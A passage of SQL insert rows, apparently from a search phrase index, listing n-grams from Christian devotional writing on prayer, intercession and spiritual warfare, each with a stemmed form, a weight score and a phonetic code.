(275756, 'stronger your \'intercessory', 'stronger your intercessory', 0, 1, 1.9, 'S3652653626', 1, '*'),
(275757, 'structure in your', 'structur in your', 0, 1, 1.5667, 'S3623656', 1, '*'),
(275758, 'structure on', 'structur on', 0, 1, 1.4, 'S362365', 1, '*'),
(275759, 'structure on which', 'structur on which', 0, 1, 1.6, 'S3623652', 1, '*'),
(275760, 'students', 'student', 0, 0, 0.5333, 'S3532', 1, '*'),
(275761, 'students they', 'student they', 0, 1, 1.4333, 'S35323', 1, '*'),
(275762, 'students they never', 'student they never', 0, 1, 1.6333, 'S35323516', 1, '*'),
(275763, 'studied', 'studi', 0, 0, 0.4667, 'S300', 1, '*'),
(275764, 'studied on', 'studi on', 0, 1, 1.3333, 'S350', 1, '*'),
(275765, 'studied on the', 'studi on the', 0, 1, 1.4667, 'S353', 1, '*'),
(275766, 'such as christian', 'such as christian', 0, 1, 1.5667, 'S6235', 1, '*'),
(275767, 'sunday fashion', 'sundai fashion', 0, 1, 1.4667, 'S53125', 1, '*'),
(275768, 'sunday fashion contest', 'sundai fashion contest', 0, 1, 1.7333, 'S5312525323', 1, '*'),
(275769, 'take intercession', 'take intercession', 0, 1, 1.5667, 'T253625', 1, '*'),
(275770, 'take intercession serious', 'take intercession serious', 0, 1, 1.8333, 'T253625262', 1, '*'),
(275771, 'take notes', 'take notes', 0, 1, 1.3333, 'T2532', 1, '*'),
(275772, 'take notes but', 'take notes but', 0, 1, 1.4667, 'T253213', 1, '*'),
(275773, 'take your church', 'take your church', 0, 1, 1.5333, 'T26262', 1, '*'),
(275774, 'taken their development', 'taken their development', 0, 1, 1.7667, 'T2536314153', 1, '*'),
(275775, 'taking notes', 'take notes', 0, 1, 1.4, 'T252532', 1, '*'),
(275776, 'taking notes in', 'take notes in', 0, 1, 1.5, 'T2525325', 1, '*'),
(275777, 'tapes', 'tape', 0, 0, 0.3333, 'T120', 1, '*'),
(275778, 'tapes books', 'tape books', 0, 1, 1.3667, 'T1212', 1, '*'),
(275779, 'tapes books music', 'tape books music', 0, 1, 1.5667, 'T121252', 1, '*'),
(275780, 'that abounds', 'that abounds', 0, 1, 1.4, 'T1532', 1, '*'),
(275781, 'that abounds in', 'that abounds in', 0, 1, 1.5, 'T15325', 1, '*'),
(275782, 'that day', 'that day', 0, 1, 1.2667, 'T000', 1, '*'),
(275783, 'that day to', 'that day to', 0, 1, 1.3667, 'T000', 1, '*'),
(275784, 'that many', 'that many', 0, 1, 1.3, 'T500', 1, '*'),
(275785, 'that many christians', 'that many christians', 0, 1, 1.6667, 'T5262352', 1, '*'),
(275786, 'that stamina', 'that stamina', 0, 1, 1.4, 'T235', 1, '*'),
(275787, 'that stamina is', 'that stamina is', 0, 1, 1.5, 'T2352', 1, '*'),
(275788, 'that we can', 'that we can', 0, 1, 1.3667, 'T250', 1, '*'),
(275789, 'that will edify', 'that will edify', 0, 1, 1.5, 'T431', 1, '*'),
(275790, 'that will end', 'that will end', 0, 1, 1.4333, 'T453', 1, '*'),
(275791, 'the art', 'the art', 0, 1, 1.2333, 'T630', 1, '*'),
(275792, 'the art of', 'the art of', 0, 1, 1.3333, 'T631', 1, '*'),
(275793, 'the basic foundation', 'the basic foundation', 0, 1, 1.6667, 'T121535', 1, '*'),
(275794, 'the bible we', 'the bible we', 0, 1, 1.4, 'T140', 1, '*'),
(275795, 'the capacity spiritual', 'the capacity spiritual', 0, 1, 1.7333, 'T212321634', 1, '*'),
(275796, 'the descriptions', 'the descriptions', 0, 1, 1.5333, 'T261352', 1, '*'),
(275797, 'the descriptions of', 'the descriptions of', 0, 1, 1.6333, 'T2613521', 1, '*'),
(275798, 'the devil and', 'the devil and', 0, 1, 1.4333, 'T1453', 1, '*'),
(275799, 'the devil hates', 'the devil hates', 0, 1, 1.5, 'T1432', 1, '*'),
(275800, 'the devil we', 'the devil we', 0, 1, 1.4, 'T140', 1, '*'),
(275801, 'the earth habakkuk', 'the earth habakkuk', 0, 1, 1.6, 'T6312', 1, '*'),
(275802, 'the earth the', 'the earth the', 0, 1, 1.4333, 'T630', 1, '*'),
(275803, 'the fire ofleadership', 'the fire ofleadership', 0, 1, 1.7, 'T16143621', 1, '*'),
(275804, 'the fullest', 'the fullest', 0, 1, 1.3667, 'T1423', 1, '*'),
(275805, 'the fullest is', 'the fullest is', 0, 1, 1.4667, 'T14232', 1, '*'),
(275806, 'the gospel doesn\'t', 'the gospel doesn', 0, 1, 1.6, 'T2143253', 1, '*'),
(275807, 'the just shall', 'the just shall', 0, 1, 1.4667, 'T2324', 1, '*'),
(275808, 'the key points', 'the key points', 0, 1, 1.4667, 'T21532', 1, '*'),
(275809, 'the leadership', 'the leadership', 0, 1, 1.4667, 'T43621', 1, '*'),
(275810, 'the leadership structure', 'the leadership structure', 0, 1, 1.8, 'T43621236236', 1, '*'),
(275811, 'the less', 'the less', 0, 1, 1.2667, 'T420', 1, '*'),
(275812, 'the less likely', 'the less likely', 0, 1, 1.5, 'T42424', 1, '*'),
(275813, 'the man who', 'the man who', 0, 1, 1.3667, 'T500', 1, '*'),
(275814, 'the more effective', 'the more effective', 0, 1, 1.6, 'T561231', 1, '*'),
(275815, 'the more scriptures', 'the more scriptures', 0, 1, 1.6333, 'T56261362', 1, '*'),
(275816, 'the ones leading', 'the ones leading', 0, 1, 1.5333, 'T524352', 1, '*'),
(275817, 'the only way', 'the only way', 0, 1, 1.4, 'T540', 2, '*'),
(275818, 'the previous', 'the previous', 0, 1, 1.4, 'T1612', 1, '*'),
(275819, 'the previous chapter', 'the previous chapter', 0, 1, 1.6667, 'T1612136', 1, '*'),
(275820, 'the primary commission', 'the primary commission', 0, 1, 1.7333, 'T16562525', 1, '*'),
(275821, 'the primary tool', 'the primary tool', 0, 1, 1.5333, 'T165634', 1, '*'),
(275822, 'the roles', 'the roles', 0, 1, 1.3, 'T642', 1, '*'),
(275823, 'the roles a', 'the roles a', 0, 1, 1.3667, 'T642', 1, '*'),
(275824, 'the scriptures the', 'the scriptures the', 0, 1, 1.6, 'T2613623', 1, '*'),
(275825, 'the stamina', 'the stamina', 0, 1, 1.3667, 'T235', 1, '*'),
(275826, 'the stamina to', 'the stamina to', 0, 1, 1.4667, 'T2353', 1, '*'),
(275827, 'the structure', 'the structure', 0, 1, 1.4333, 'T236236', 1, '*'),
(275828, 'the structure on', 'the structure on', 0, 1, 1.5333, 'T2362365', 1, '*'),
(275829, 'the theory', 'the theory', 0, 1, 1.3333, 'T600', 1, '*'),
(275830, 'the theory of', 'the theory of', 0, 1, 1.4333, 'T610', 1, '*'),
(275831, 'the title but', 'the title but', 0, 1, 1.4333, 'T413', 1, '*'),
(275832, 'the truth that', 'the truth that', 0, 1, 1.4667, 'T630', 1, '*'),
(275833, 'the war', 'the war', 0, 1, 1.2333, 'T600', 1, '*'),
(275834, 'the war on', 'the war on', 0, 1, 1.3333, 'T650', 1, '*'),
(275835, 'the world around', 'the world around', 0, 1, 1.5333, 'T643653', 2, '*'),
(275836, 'the world faith', 'the world faith', 0, 1, 1.5, 'T64313', 1, '*'),
(275837, 'the worst', 'the worst', 0, 1, 1.3, 'T623', 1, '*'),
(275838, 'the worst thing', 'the worst thing', 0, 1, 1.5, 'T62352', 1, '*'),
(275839, 'their development', 'their development', 0, 1, 1.5667, 'T6314153', 1, '*'),
(275840, 'their development process', 'their development process', 0, 1, 1.8333, 'T6314153162', 1, '*'),
(275841, 'their responsibilities', 'their responsibilities', 0, 1, 1.7333, 'T621521432', 1, '*'),
(275842, 'their responsibilities and', 'their responsibilities and', 0, 1, 1.8667, 'T62152143253', 1, '*'),
(275843, 'them make', 'them make', 0, 1, 1.3, 'T520', 1, '*'),
(275844, 'them make a', 'them make a', 0, 1, 1.3667, 'T520', 1, '*'),
(275845, 'theory', 'theori', 0, 0, 0.4, 'T600', 1, '*'),
(275846, 'theory of', 'theori of', 0, 1, 1.3, 'T610', 1, '*'),
(275847, 'theory of driving', 'theori of driving', 0, 1, 1.5667, 'T6136152', 1, '*'),
(275848, 'there would', 'there would', 0, 1, 1.3667, 'T643', 1, '*'),
(275849, 'there would be', 'there would be', 0, 1, 1.4667, 'T6431', 1, '*'),
(275850, 'thermometer', 'thermomet', 0, 0, 0.7333, 'T6536', 1, '*'),
(275851, 'thermometer christian', 'thermomet christian', 0, 1, 1.7, 'T653626235', 1, '*'),
(275852, 'thermometer christian or', 'thermomet christian or', 0, 1, 1.8, 'T6536262356', 1, '*'),
(275853, 'thermostat', 'thermostat', 0, 0, 0.6667, 'T6523', 1, '*'),
(275854, 'thermostat christian', 'thermostat christian', 0, 1, 1.6667, 'T652326235', 1, '*'),
(275855, 'thermostat christian do', 'thermostat christian do', 0, 1, 1.7667, 'T6523262353', 1, '*'),
(275856, 'these things work', 'these things work', 0, 1, 1.5667, 'T235262', 1, '*'),
(275857, 'they find themselves', 'thei find themselves', 0, 1, 1.6667, 'T15352412', 1, '*'),
(275858, 'they never read', 'thei never read', 0, 1, 1.5, 'T5163', 1, '*'),
(275859, 'thing you can', 'thing you can', 0, 1, 1.4333, 'T525', 1, '*'),
(275860, 'things that will', 'thing that will', 0, 1, 1.5333, 'T5234', 1, '*'),
(275861, 'things truth', 'thing truth', 0, 1, 1.4, 'T52363', 1, '*'),
(275862, 'things truth righteousness', 'thing truth righteousness', 0, 1, 1.8667, 'T52363623252', 1, '*'),
(275863, 'things work hand', 'thing work hand', 0, 1, 1.5333, 'T526253', 1, '*'),
(275864, 'this if', 'thi if', 0, 1, 1.2333, 'T210', 1, '*'),
(275865, 'this if you', 'thi if you', 0, 1, 1.3667, 'T210', 1, '*'),
(275866, 'this is how', 'thi is how', 0, 1, 1.3667, 'T200', 1, '*'),
(275867, 'this morning', 'thi morning', 0, 1, 1.4, 'T25652', 1, '*'),
(275868, 'this morning as', 'thi morning as', 0, 1, 1.5, 'T25652', 1, '*'),
(275869, 'this point was', 'thi point was', 0, 1, 1.4667, 'T21532', 1, '*'),
(275870, 'this question', 'thi question', 0, 1, 1.4333, 'T235', 1, '*'),
(275871, 'this question are', 'thi question are', 0, 1, 1.5667, 'T2356', 1, '*'),
(275872, 'this role', 'thi role', 0, 1, 1.3, 'T264', 1, '*'),
(275873, 'this role can', 'thi role can', 0, 1, 1.4333, 'T26425', 1, '*'),
(275874, 'this that many', 'thi that many', 0, 1, 1.4667, 'T235', 1, '*'),
(275875, 'this there', 'thi there', 0, 1, 1.3333, 'T236', 1, '*'),
(275876, 'this there are', 'thi there are', 0, 1, 1.4667, 'T236', 1, '*'),
(275877, 'this world', 'thi world', 0, 1, 1.3333, 'T2643', 1, '*'),
(275878, 'this world of', 'thi world of', 0, 1, 1.4333, 'T26431', 1, '*'),
(275879, 'those notes', 'those notes', 0, 1, 1.3667, 'T2532', 1, '*'),
(275880, 'those who are', 'those who are', 0, 1, 1.4333, 'T260', 1, '*'),
(275881, 'those who have', 'those who have', 0, 1, 1.4667, 'T210', 1, '*'),
(275882, 'those who lead', 'those who lead', 0, 1, 1.4667, 'T243', 1, '*'),
(275883, 'through all your', 'through all your', 0, 1, 1.5333, 'T6246', 1, '*'),
(275884, 'through his servants', 'through his servants', 0, 1, 1.6667, 'T6261532', 1, '*'),
(275885, 'through the bible', 'through the bible', 0, 1, 1.5667, 'T62314', 2, '*'),
(275886, 'time 6', 'time 6', 0, 1, 1.2, 'T500', 1, '*'),
(275887, 'time 6 you', 'time 6 you', 0, 1, 1.3333, 'T500', 1, '*'),
(275888, 'time by', 'time by', 0, 1, 1.2333, 'T510', 1, '*'),
(275889, 'time by praying', 'time by praying', 0, 1, 1.5, 'T51652', 1, '*'),
(275890, 'time is', 'time is', 0, 1, 1.2333, 'T520', 1, '*'),
(275891, 'time is the', 'time is the', 0, 1, 1.3667, 'T523', 1, '*'),
(275892, 'time reading', 'time reading', 0, 1, 1.4, 'T56352', 1, '*'),
(275893, 'time reading the', 'time reading the', 0, 1, 1.5333, 'T563523', 1, '*'),
(275894, 'title but may', 'titl but may', 0, 1, 1.4333, 'T4135', 1, '*'),
(275895, 'to a degree', 'to a degree', 0, 1, 1.3667, 'T260', 1, '*'),
(275896, 'to acquire', 'to acquire', 0, 1, 1.3333, 'T260', 1, '*'),
(275897, 'to acquire and', 'to acquire and', 0, 1, 1.4667, 'T2653', 1, '*'),
(275898, 'to approach a', 'to approach a', 0, 1, 1.4333, 'T162', 1, '*'),
(275899, 'to be an', 'to be an', 0, 1, 1.2667, 'T150', 2, '*'),
(275900, 'to be prepared', 'to be prepared', 0, 1, 1.4667, 'T16163', 1, '*'),
(275901, 'to conduct', 'to conduct', 0, 1, 1.3333, 'T25323', 1, '*'),
(275902, 'to conduct spiritual', 'to conduct spiritual', 0, 1, 1.6667, 'T2532321634', 1, '*'),
(275903, 'to do that', 'to do that', 0, 1, 1.3333, 'T000', 2, '*'),
(275904, 'to drive', 'to drive', 0, 1, 1.2667, 'T610', 1, '*'),
(275905, 'to drive and', 'to drive and', 0, 1, 1.4, 'T6153', 1, '*'),
(275906, 'to drive until', 'to drive until', 0, 1, 1.4667, 'T61534', 1, '*'),
(275907, 'to fulfill', 'to fulfill', 0, 1, 1.3333, 'T1414', 1, '*'),
(275908, 'to fulfill your', 'to fulfill your', 0, 1, 1.5, 'T14146', 1, '*'),
(275909, 'to function as', 'to function as', 0, 1, 1.4667, 'T152352', 1, '*'),
(275910, 'to get that', 'to get that', 0, 1, 1.3667, 'T230', 1, '*'),
(275911, 'to help you', 'to help you', 0, 1, 1.3667, 'T410', 1, '*'),
(275912, 'to intercede', 'to intercede', 0, 1, 1.4, 'T53623', 1, '*'),
(275913, 'to intercede for', 'to intercede for', 0, 1, 1.5333, 'T5362316', 1, '*'),
(275914, 'to lead in', 'to lead in', 0, 1, 1.3333, 'T435', 2, '*'),
(275915, 'to lead others', 'to lead others', 0, 1, 1.4667, 'T4362', 1, '*'),
(275916, 'to learn how', 'to learn how', 0, 1, 1.4, 'T465', 2, '*'),
(275917, 'to lie', 'to lie', 0, 1, 1.2, 'T400', 1, '*'),
(275918, 'to lie to', 'to lie to', 0, 1, 1.3, 'T430', 1, '*'),
(275919, 'to our hearts', 'to our hearts', 0, 1, 1.4333, 'T632', 1, '*'),
(275920, 'to play on', 'to play on', 0, 1, 1.3333, 'T145', 1, '*'),
(275921, 'to pray always', 'to pray always', 0, 1, 1.4667, 'T1642', 1, '*'),
(275922, 'to put everything', 'to put everything', 0, 1, 1.5667, 'T1316352', 1, '*'),
(275923, 'to reach', 'to reach', 0, 1, 1.2667, 'T620', 1, '*'),
(275924, 'to reach out', 'to reach out', 0, 1, 1.4, 'T623', 1, '*'),
(275925, 'to represent', 'to represent', 0, 1, 1.4, 'T616253', 1, '*'),
(275926, 'to represent god\'s', 'to represent god', 0, 1, 1.6, 'T616253232', 1, '*'),
(275927, 'to ruin', 'to ruin', 0, 1, 1.2333, 'T650', 1, '*'),
(275928, 'to ruin your', 'to ruin your', 0, 1, 1.4, 'T656', 1, '*'),
(275929, 'to stand against', 'to stand against', 0, 1, 1.5333, 'T23532523', 1, '*'),
(275930, 'to the fullest', 'to the fullest', 0, 1, 1.4667, 'T1423', 1, '*'),
(275931, 'to their responsibilities', 'to their responsibilities', 0, 1, 1.8333, 'T621521432', 1, '*'),
(275932, 'to wake', 'to wake', 0, 1, 1.2333, 'T200', 1, '*'),
(275933, 'to wake up', 'to wake up', 0, 1, 1.3333, 'T210', 1, '*'),
(275934, 'to win', 'to win', 0, 1, 1.2, 'T500', 2, '*'),
(275935, 'to win souls', 'to win souls', 0, 1, 1.4, 'T5242', 1, '*'),
(275936, 'to withstand', 'to withstand', 0, 1, 1.4, 'T2353', 1, '*'),
(275937, 'to withstand in', 'to withstand in', 0, 1, 1.5, 'T23535', 1, '*'),
(275938, 'to you concerning', 'to you concerning', 0, 1, 1.5667, 'T252652', 1, '*'),
(275939, 'today by', 'todai by', 0, 1, 1.2667, 'T100', 1, '*'),
(275940, 'today by looking', 'todai by looking', 0, 1, 1.5333, 'T14252', 1, '*'),
(275941, 'today\'s christians', 'todai christians', 0, 1, 1.6, 'T262352', 1, '*'),
(275942, 'today\'s christians and', 'todai christians and', 0, 1, 1.7333, 'T26235253', 1, '*'),
(275943, 'tool of', 'tool of', 0, 1, 1.2333, 'T410', 1, '*'),
(275944, 'tool of communication', 'tool of communication', 0, 1, 1.7, 'T4125235', 1, '*'),
(275945, 'town', 'town', 0, 0, 0.2667, 'T500', 2, '*'),
(275946, 'town state', 'town state', 0, 1, 1.3333, 'T523', 1, '*'),
(275947, 'town state nation', 'town state nation', 0, 1, 1.5667, 'T523535', 1, '*'),
(275948, 'true christian must', 'true christian must', 0, 1, 1.6333, 'T62623523', 1, '*'),
(275949, 'true christian should', 'true christian should', 0, 1, 1.7, 'T626235243', 1, '*'),
(275950, 'truth and', 'truth and', 0, 1, 1.3, 'T6353', 1, '*'),
(275951, 'truth and sellit', 'truth and sellit', 0, 1, 1.5333, 'T6353243', 1, '*'),
(275952, 'truth righteousness', 'truth righteousness', 0, 1, 1.6333, 'T63623252', 1, '*'),
(275953, 'truth righteousness the', 'truth righteousness the', 0, 1, 1.7667, 'T636232523', 1, '*'),
(275954, 'truth that', 'truth that', 0, 1, 1.3333, 'T630', 1, '*'),
(275955, 'truth that abounds', 'truth that abounds', 0, 1, 1.6, 'T631532', 1, '*'),
(275956, 'truth wisdom', 'truth wisdom', 0, 1, 1.4, 'T63235', 1, '*'),
(275957, 'truth wisdom divine', 'truth wisdom divine', 0, 1, 1.6333, 'T63235315', 1, '*'),
(275958, 'unaware', 'unawar', 0, 0, 0.4667, 'U560', 1, '*'),
(275959, 'unaware and', 'unawar and', 0, 1, 1.3667, 'U5653', 1, '*'),
(275960, 'unaware and unprepared', 'unawar and unprepared', 0, 1, 1.7333, 'U5653516163', 1, '*'),
(275961, 'understanding one', 'understand one', 0, 1, 1.5667, 'U5362353525', 1, '*'),
(275962, 'understanding one way', 'understand one way', 0, 1, 1.7, 'U5362353525', 1, '*'),
(275963, 'understanding the more', 'understand the more', 0, 1, 1.7333, 'U536235352356', 1, '*'),
(275964, 'understanding you', 'understand you', 0, 1, 1.5667, 'U536235352', 1, '*'),
(275965, 'understanding you must', 'understand you must', 0, 1, 1.7333, 'U536235352523', 1, '*'),
(275966, 'unprepared', 'unprepar', 0, 0, 0.6667, 'U516163', 1, '*'),
(275967, 'unprepared for', 'unprepar for', 0, 1, 1.4667, 'U51616316', 1, '*'),
(275968, 'unprepared for the', 'unprepar for the', 0, 1, 1.6, 'U516163163', 1, '*'),
(275969, 'until you get', 'until you get', 0, 1, 1.4333, 'U53423', 1, '*'),
(275970, 'up is not', 'up is not', 0, 1, 1.3, 'U1253', 1, '*'),
(275971, 'up to their', 'up to their', 0, 1, 1.3667, 'U136', 1, '*'),
(275972, 'upleading', 'uplead', 0, 0, 0.6, 'U14352', 1, '*'),
(275973, 'upleading everyone', 'uplead everyone', 0, 1, 1.6, 'U14352165', 1, '*'),
(275974, 'upleading everyone else', 'uplead everyone else', 0, 1, 1.7667, 'U1435216542', 1, '*'),
(275975, 'upright in', 'upright in', 0, 1, 1.3333, 'U16235', 1, '*'),
(275976, 'upright in him', 'upright in him', 0, 1, 1.4667, 'U16235', 1, '*'),
(275977, 'urgent', 'urgent', 0, 0, 0.4, 'U6253', 1, '*'),
(275978, 'urgent need', 'urgent need', 0, 1, 1.3667, 'U625353', 1, '*'),
(275979, 'urgent need for', 'urgent need for', 0, 1, 1.5, 'U62535316', 1, '*'),
(275980, 'urgently', 'urgent', 0, 0, 0.5333, 'U62534', 1, '*'),
(275981, 'urgently and', 'urgent and', 0, 1, 1.4, 'U6253453', 1, '*'),
(275982, 'urgently and you', 'urgent and you', 0, 1, 1.5333, 'U6253453', 1, '*'),
(275983, 'us as christians', 'us as christians', 0, 1, 1.5333, 'U262352', 1, '*'),
(275984, 'us look', 'us look', 0, 1, 1.2333, 'U242', 1, '*'),
(275985, 'us look at', 'us look at', 0, 1, 1.3333, 'U2423', 1, '*'),
(275986, 'us to function', 'us to function', 0, 1, 1.4667, 'U2315235', 1, '*'),
(275987, 'us to play', 'us to play', 0, 1, 1.3333, 'U2314', 1, '*'),
(275988, 'use the more', 'us the more', 0, 1, 1.4, 'U2356', 1, '*'),
(275989, 'very serious develop', 'veri serious develop', 0, 1, 1.6667, 'V62623141', 1, '*'),
(275990, 'wake', 'wake', 0, 0, 0.2667, 'W200', 1, '*'),
(275991, 'wake up', 'wake up', 0, 1, 1.2333, 'W210', 1, '*'),
(275992, 'wake up to', 'wake up to', 0, 1, 1.3333, 'W213', 1, '*'),
(275993, 'walk in faith', 'walk in faith', 0, 1, 1.4333, 'W42513', 1, '*'),
(275994, 'want to learn', 'want to learn', 0, 1, 1.4333, 'W53465', 1, '*'),
(275995, 'wants to ruin', 'want to ruin', 0, 1, 1.4333, 'W532365', 1, '*'),
(275996, 'war christianity', 'war christianity', 0, 1, 1.5333, 'W6262353', 1, '*'),
(275997, 'war christianity is', 'war christianity is', 0, 1, 1.6333, 'W62623532', 1, '*'),
(275998, 'war on', 'war on', 0, 1, 1.2, 'W650', 1, '*'),
(275999, 'war on ground', 'war on ground', 0, 1, 1.4333, 'W652653', 1, '*'),
(276000, 'warfare', 'warfar', 0, 0, 0.4667, 'W616', 1, '*'),
(276001, 'warfare against', 'warfar against', 0, 1, 1.5, 'W6162523', 1, '*'),
(276002, 'warfare against the', 'warfar against the', 0, 1, 1.6333, 'W6162523', 1, '*'),
(276003, 'warfare lastly', 'warfar lastly', 0, 1, 1.4667, 'W6164234', 1, '*'),
(276004, 'warfare lastly you', 'warfar lastly you', 0, 1, 1.6, 'W6164234', 1, '*'),
(276005, 'warfare properly', 'warfar properly', 0, 1, 1.5333, 'W61616164', 1, '*'),
(276006, 'warfare properly you', 'warfar properly you', 0, 1, 1.6667, 'W61616164', 1, '*'),
(276007, 'warfare the', 'warfar the', 0, 1, 1.3667, 'W6163', 1, '*'),
(276008, 'warfare the key', 'warfar the key', 0, 1, 1.5, 'W61632', 1, '*'),
(276009, 'was dealt', 'wa dealt', 0, 1, 1.3, 'W2343', 1, '*'),
(276010, 'was dealt extensively', 'wa dealt extensively', 0, 1, 1.7, 'W2343235214', 1, '*'),
(276011, 'was given the', 'wa given the', 0, 1, 1.4333, 'W2153', 1, '*'),
(276012, 'way you can', 'wai you can', 0, 1, 1.3667, 'W250', 1, '*'),
(276013, 'we are at', 'we are at', 0, 1, 1.3, 'W630', 1, '*'),
(276014, 'we as', 'we as', 0, 1, 1.1667, 'W200', 1, '*'),
(276015, 'we as christians', 'we as christians', 0, 1, 1.5333, 'W262352', 1, '*'),
(276016, 'we can properly', 'we can properly', 0, 1, 1.5, 'W2516164', 1, '*'),
(276017, 'we hear', 'we hear', 0, 1, 1.2333, 'W600', 1, '*'),
(276018, 'we hear many', 'we hear many', 0, 1, 1.4, 'W650', 1, '*'),
(276019, 'we need faith', 'we need faith', 0, 1, 1.4333, 'W5313', 1, '*'),
(276020, 'we saw', 'we saw', 0, 1, 1.2, 'W200', 1, '*'),
(276021, 'we saw in', 'we saw in', 0, 1, 1.3, 'W250', 1, '*'),
(276022, 'we stand', 'we stand', 0, 1, 1.2667, 'W2353', 1, '*'),
(276023, 'we stand as', 'we stand as', 0, 1, 1.3667, 'W23532', 1, '*'),
(276024, 'we studied', 'we studied', 0, 1, 1.3333, 'W230', 1, '*'),
(276025, 'we studied on', 'we studied on', 0, 1, 1.4333, 'W235', 1, '*'),
(276026, 'we wrestle', 'we wrestle', 0, 1, 1.3333, 'W6234', 1, '*'),
(276027, 'we wrestle against', 'we wrestle against', 0, 1, 1.6, 'W62342523', 1, '*'),
(276028, 'we\'ve seen', 'we seen', 0, 1, 1.3333, 'W125', 1, '*'),
(276029, 'we\'ve seen so', 'we seen so', 0, 1, 1.4333, 'W1252', 1, '*'),
(276030, 'week we studied', 'week we studied', 0, 1, 1.5, 'W230', 1, '*'),
(276031, 'what paul', 'what paul', 0, 1, 1.3, 'W314', 1, '*'),
(276032, 'what paul says', 'what paul says', 0, 1, 1.4667, 'W3142', 1, '*'),
(276033, 'what you don\'t', 'what you don', 0, 1, 1.4667, 'W353', 1, '*'),
(276034, 'what your position', 'what your position', 0, 1, 1.6, 'W361235', 1, '*'),
(276035, 'when a loved', 'when a loved', 0, 1, 1.4, 'W5413', 1, '*'),
(276036, 'when god leads', 'when god leads', 0, 1, 1.4667, 'W523432', 1, '*'),
(276037, 'when it seems', 'when it seems', 0, 1, 1.4333, 'W53252', 1, '*'),
(276038, 'where you find', 'where you find', 0, 1, 1.4667, 'W6153', 1, '*'),
(276039, 'wherever', 'wherev', 0, 0, 0.5333, 'W616', 1, '*'),
(276040, 'wherever they', 'wherev they', 0, 1, 1.4333, 'W6163', 1, '*'),
(276041, 'wherever they find', 'wherev they find', 0, 1, 1.6, 'W6163153', 1, '*'),
(276042, 'which christianity', 'which christianity', 0, 1, 1.6, 'W262353', 1, '*'),
(276043, 'which christianity rests', 'which christianity rests', 0, 1, 1.8, 'W2623536232', 1, '*'),
(276044, 'which is lifted', 'which is lifted', 0, 1, 1.5, 'W2413', 1, '*'),
(276045, 'which we', 'which we', 0, 1, 1.2667, 'W200', 1, '*'),
(276046, 'which we stand', 'which we stand', 0, 1, 1.4667, 'W2353', 1, '*'),
(276047, 'who are in', 'who are in', 0, 1, 1.3333, 'W650', 1, '*'),
(276048, 'who doesn\'t', 'who doesn', 0, 1, 1.3667, 'W3253', 1, '*'),
(276049, 'who doesn\'t know', 'who doesn know', 0, 1, 1.5333, 'W325325', 1, '*'),
(276050, 'who doesn\'t walk', 'who doesn walk', 0, 1, 1.5333, 'W325342', 1, '*'),
(276051, 'who have', 'who have', 0, 1, 1.2667, 'W100', 2, '*'),
(276052, 'who have taken', 'who have taken', 0, 1, 1.4667, 'W1325', 1, '*'),
(276053, 'who knows what', 'who knows what', 0, 1, 1.4667, 'W2523', 1, '*'),
(276054, 'who lead', 'who lead', 0, 1, 1.2667, 'W430', 1, '*'),
(276055, 'who lead and', 'who lead and', 0, 1, 1.4, 'W4353', 1, '*'),
(276056, 'who lead are', 'who lead are', 0, 1, 1.4, 'W436', 1, '*'),
(276057, 'wholeheartedly', 'wholeheartedli', 0, 0, 0.9333, 'W4634', 1, '*'),
(276058, 'wholeheartedly effective', 'wholeheartedli effective', 0, 1, 1.8, 'W46341231', 1, '*'),
(276059, 'wholeheartedly effective followership', 'wholeheartedli effective followership', 0, 1, 2, 'W463412314621', 1, '*'),
(276060, 'will edify', 'will edify', 0, 1, 1.3333, 'W431', 1, '*'),
(276061, 'will edify and', 'will edify and', 0, 1, 1.4667, 'W43153', 1, '*'),
(276062, 'will end', 'will end', 0, 1, 1.2667, 'W453', 1, '*'),
(276063, 'will end upleading', 'will end upleading', 0, 1, 1.6, 'W45314352', 1, '*'),
(276064, 'win souls', 'win souls', 0, 1, 1.3, 'W5242', 1, '*'),
(276065, 'win souls for', 'win souls for', 0, 1, 1.4333, 'W524216', 1, '*'),
(276066, 'wisdom and', 'wisdom and', 0, 1, 1.3333, 'W2353', 1, '*'),
(276067, 'wisdom and instruction', 'wisdom and instruction', 0, 1, 1.7333, 'W23535236235', 1, '*'),
(276068, 'wisdom and understanding', 'wisdom and understanding', 0, 1, 1.8, 'W2353536235352', 1, '*'),
(276069, 'wisdom divine', 'wisdom divine', 0, 1, 1.4333, 'W235315', 1, '*'),
(276070, 'wisdom divine instruction', 'wisdom divine instruction', 0, 1, 1.8333, 'W235315236235', 1, '*'),
(276071, 'wisdom spiritual', 'wisdom spiritual', 0, 1, 1.5333, 'W23521634', 1, '*'),
(276072, 'wisdom spiritual depth', 'wisdom spiritual depth', 0, 1, 1.7333, 'W23521634313', 1, '*'),
(276073, 'with god for', 'with god for', 0, 1, 1.4, 'W32316', 1, '*'),
(276074, 'with in', 'with in', 0, 1, 1.2333, 'W350', 1, '*'),
(276075, 'with in the', 'with in the', 0, 1, 1.3667, 'W353', 1, '*'),
(276076, 'with the following', 'with the following', 0, 1, 1.6, 'W31452', 1, '*'),
(276077, 'with the truth', 'with the truth', 0, 1, 1.4667, 'W363', 1, '*'),
(276078, 'withstand', 'withstand', 0, 0, 0.6, 'W32353', 2, '*'),
(276079, 'withstand in', 'withstand in', 0, 1, 1.4, 'W323535', 1, '*'),
(276080, 'withstand in that', 'withstand in that', 0, 1, 1.5667, 'W3235353', 1, '*'),
(276081, 'woman of', 'woman of', 0, 1, 1.2667, 'W510', 1, '*'),
(276082, 'woman of great', 'woman of great', 0, 1, 1.4667, 'W51263', 1, '*'),
(276083, 'word all', 'word all', 0, 1, 1.2667, 'W634', 1, '*'),
(276084, 'word all these', 'word all these', 0, 1, 1.4667, 'W63432', 1, '*'),
(276085, 'word through', 'word through', 0, 1, 1.4, 'W6362', 1, '*'),
(276086, 'word through the', 'word through the', 0, 1, 1.5333, 'W63623', 1, '*'),
(276087, 'work hand', 'work hand', 0, 1, 1.3, 'W6253', 1, '*'),
(276088, 'work hand in', 'work hand in', 0, 1, 1.4, 'W62535', 1, '*'),
(276089, 'work is god', 'work is god', 0, 1, 1.3667, 'W623', 1, '*'),
(276090, 'world and in', 'world and in', 0, 1, 1.4, 'W643535', 1, '*'),
(276091, 'world around', 'world around', 0, 1, 1.4, 'W643653', 2, '*'),
(276092, 'world around you', 'world around you', 0, 1, 1.5333, 'W643653', 2, '*'),
(276093, 'world faith', 'world faith', 0, 1, 1.3667, 'W64313', 1, '*'),
(276094, 'world faith is', 'world faith is', 0, 1, 1.4667, 'W643132', 1, '*'),
(276095, 'worst thing', 'worst thing', 0, 1, 1.3667, 'W62352', 1, '*'),
(276096, 'worst thing you', 'worst thing you', 0, 1, 1.5, 'W62352', 1, '*'),
